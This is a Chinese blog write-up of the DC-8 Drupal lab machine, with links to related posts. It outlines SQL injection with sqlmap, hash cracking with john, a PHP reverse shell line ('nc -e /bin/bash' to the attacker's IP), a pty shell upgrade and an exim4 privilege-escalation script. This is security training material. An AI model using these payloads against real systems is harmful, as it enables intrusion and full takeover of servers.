DC-8(drupal)靶机

最新推荐文章于 2024-11-05 08:53:46 发布
最新推荐文章于 2024-11-05 08:53:46 发布
阅读量61 收藏
点赞数
分类专栏: DC系列靶机 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56726035/article/details/131829467
版权

扫描出ip

Arp-scan -l

扫描端口

 

也是只有80和22号端口

访问网页

熟悉,不能再熟悉了

网页探测

变成了drupal7,这就和dc-1那个版本一样

那我们直接用dc-1的方法试一试

启动msfconsole

搜索Drupal的漏洞,然后一个一个尝试看是否可以利用。

一个一个的尝试

结果可想而知,全部失败

那就换一种思路

扫描目录

有一个/user登录界面

 

又回到网站去看看吧

 

发现一个框

抓包看看

我确实没看出什么,没什么利用点

那就又换吧

结果在这个地方发现了不对

当点击这三个,上面的url变了nid会变成1,2,3

 

我们尝试一下有没有注入点

 

报错

 

 

可以尝试sql注入

我们直接上sqlmap

 

数据库d7db

爆表

 

 

爆字段

  

爆数据

 

 

复制下来去解密一下

用john解密

john dc8.txt

然后爆破出turtle

我们尝试登录

Ssh登录失败,那应该是网页的登录

我们尝试一下

结果是john的密码

我们探索网站

         

这里可以写入东西

我们写入反弹shell

<?php system(“nc -e /bin/bash 172.16.16.130 5555”);?>

我们kali上先开启监听

 

有时候在这里输入一下才行

我们去kali上开启交互式shell

Python -c ‘import pty;pty.spawn(“/bin/bash”)’

 

查看系统命令

有很熟悉exim4

看看版本

我们去搜索一下版本漏洞

 

本地提权

下载下来看看

然后开启http服务

 

靶机去下载

 

然后运行

./469.sh -m netcat

成功 

Joey_L.
关注
专栏目录
DC-8靶机渗透
m0_62008601的博客
06-05 1056
dc-8靶机详细渗透过程
DC-8的靶机渗透
m0_74950307的博客
11-01 78
漏洞利用因失败而中止:不易受攻击:目标不可利用。“将强制漏洞利用设置为 true”以覆盖检查结果。Exim是一款开源的邮件传输代理(MTA),通常用于在Linux系统上发送、接收和路由电子邮件。时,模块将自动对目标进行漏洞检查,以确定目标是否易受漏洞影响。在做题的时候发现在我做wp的时候他自己退出了root,查看一下问sh文件。声明一下:kali的IP:192.168.13.138。然后将其运行:./hack.sh -m netcat。我又重新回复了一下我之前的快照,最后破解出来了。
DC-7靶机通关
qq_63831588的博客
08-01 1135
在这里我找了半天也没有找出来是有什么线索还是什么,也尝试了找一些注入点啊或者什么的,但是都不行,总之就是卡住了,然后我看了一下题解,他这个账号密码给的很莫名其妙,是在 github上面放着的!www-date 这个用户是有读写执行的权限,但是其他用户只可以读和执行这个脚本,但是没有写的权限,这也就是为什么我们上面要拿到www这个用户的shell,我们拿到以后在这个脚本里加入反弹shell的权限,然后再执行一下这个脚本,由于执行的时候是以root身份执行的,所以会反弹给我们一个root的shell!
DC靶机系列:DC-8
Ays.Ie的博客
02-28 295
本篇文章为DC系列第8个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC-8靶机通关
qq_63831588的博客
08-04 703
这里我尝试找了系统里面有没有什么其他的提示性文件,以及有没有其他用户,或者是不是有一些隐藏文件之类的,结果发现什么都没有!然后我看了一下提示发现上面suid的那些命令里是有可以提权的的!这里可以上传 php 代码,这里和上一个靶机有点像,并且还不需要我们下载插件,直接就可以用!最后我们拿到了两个账号密码!不过他的密码是哈希值,需要我们爆破一下!这里跑出来了数据库名!网页长这个样子,又是熟悉的drupal!我看了提示以后发现这个可以用来提权!看了一下版本是4.89!基本可以确定是这个了!执行脚本,提权成功!
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5882
DC靶机系列渗透教程
dc-1靶机
qq_63267612的博客
09-28 1338
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupaldrupal有一些可以利用的漏洞进入msf。
DC1--靶机实操详解
qq_61802750的博客
08-02 713
111端口是一个rpcbind 2-4服务,这个服务存在一个漏洞,该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放;特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取隐藏中的东西。使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户。一个是修改admin的密码,一个是增加一个admin权限的用户。
DC-7靶机渗透详细流程
braty_的博客
02-07 1594
DC-7靶机渗透详细流程
DC-7靶机渗透
m0_62008601的博客
06-02 1065
dc-7靶机的渗透过程
复现DC-1靶机.pdf
03-22
1. 使用虚拟机(VM)技术进行靶机复现:文档描述了如何通过虚拟机安装和打开一个名为DC-1的靶机(靶场),具体是指利用VMware这样的虚拟化软件来加载一个名为DC-1.ova的虚拟机文件,从而建立一个安全的测试环境。...
DC-1 靶机安装及练习
weixin_45451139的博客
01-24 2103
1. 靶机下载安装 下载地址:DC-1 下好后,进行解压,得到一个 .ova 文件, 注意导入后将虚拟机的网络模式由桥接模式改为NAT模式 安装好后虚拟机界面如图: 2. 进行练习 2.1获取flag1文件 首先打开kali机,因为该靶机和kali在同一网段下,因此现在kali中输入ifconfig 进行查看kali机所在网段 由图可知,该kali机ip为192.168.220.128, 因此所在网段为192.168.220.0 然后,用nmap进行扫描该网段: nmap -sP 192.168.2
【vulnhub】【DC系列】DC1-Drupal 靶机
Nicky_Zheng的博客
01-26 472
1、信息收集 1.1、端口扫描 使用nmap对端口进行扫描,发现存在 80 端口开放,使用的 CMS 为 Drupal 7 (来自查看主页源代码) 1.2、漏洞信息收集 searchsploit发现 Drupal 7 存在 SQL 注入等漏洞,本次先使用 SQL 注入添加管理员账号 kali@kali:~$ searchsploit Drupal 7.0 ----------------------------------------------------------------------------
DC-1靶机渗透笔记
qq_60600840的博客
08-08 271
DC-1靶机安全、渗透、靶机
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1168
dc-1靶机详细获取flag过程新手勿喷
Neo4j数据库清理指南:如何安全地删除所有节点和索引
最新发布
engchina的专栏
11-05 282
Neo4j数据库清理指南:如何安全地删除所有节点和索引
漫途焊机安全生产监管方案,提升安全生产管理水平!
mantoo2014的博客
11-01 415
随着智能制造时代的到来,企业安全生产管理的重要性日益凸显。因此,利用物联网技术和设备监控技术加强焊机安全生产监管,成为企业提升安全生产管理效率、降低安全事故率的重要手段。漫途焊机安全生产监管方案,凭借其物联网技术和设备监控技术。
挂钩图像分割安全状态与危险状态识别系统:更新创新流程
lzmlzm89的博客
11-02 932
数据集信息展示在本研究中,我们使用了名为“test1”的数据集,以支持改进YOLOv8-seg的挂钩图像分割安全状态与危险状态识别系统的训练与验证。该数据集专门设计用于处理与安全相关的图像分类任务,旨在提高系统对不同安全状态的识别能力,从而为实际应用提供更为精准的安全监测解决方案。“test1”数据集包含三种主要类别,分别为“安全状态”、“危险状态_1”和“危险状态_2”。这些类别的选择反映了在实际应用中可能遇到的多样化安全场景,能够有效地模拟和识别不同的安全与危险状态。
网络安全渗透实际案例
专研计算机网络,数据通信,网络安全,系统集成
11-02 1229
该案例演示了如何通过信息收集、漏洞扫描、漏洞利用和后渗透测试等步骤,对目标系统进行完整的渗透测试。通过详细的操作步骤和修复建议,可以帮助安全人员更好地防御类似攻击。注意:渗透测试应仅限于合法授权的网络或系统。未经授权的渗透测试属于非法行为。步骤编号步骤名称操作说明代码示例1环境准备确保Kali Linux及相关工具已安装,如NmapMetasploitNetcat等。无2信息收集使用Nmap扫描目标系统,识别开放端口和服务版本。3确定服务漏洞。
复现DC-1靶机Drupal CMS漏洞挖掘与利用
"复现DC-1靶机的攻防演练过程,涉及网络扫描、漏洞检测、Drupal CMS的利用以及数据库操作。" 在网络安全领域,靶机是一种模拟真实系统环境的工具,用于安全研究人员和渗透测试人员进行实战演练和技能提升。本资源是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值